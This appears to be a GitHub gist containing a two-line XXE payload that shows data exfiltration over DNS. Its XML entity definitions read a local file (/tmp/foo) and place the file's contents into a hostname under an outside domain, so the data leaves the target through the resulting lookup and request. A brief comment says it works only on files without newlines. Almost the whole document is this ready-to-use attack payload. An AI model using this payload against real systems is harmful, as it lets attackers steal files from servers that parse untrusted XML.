Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
| <!ENTITY % data SYSTEM "file:///tmp/foo"> | |
| <!ENTITY % url "<!ENTITY % exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment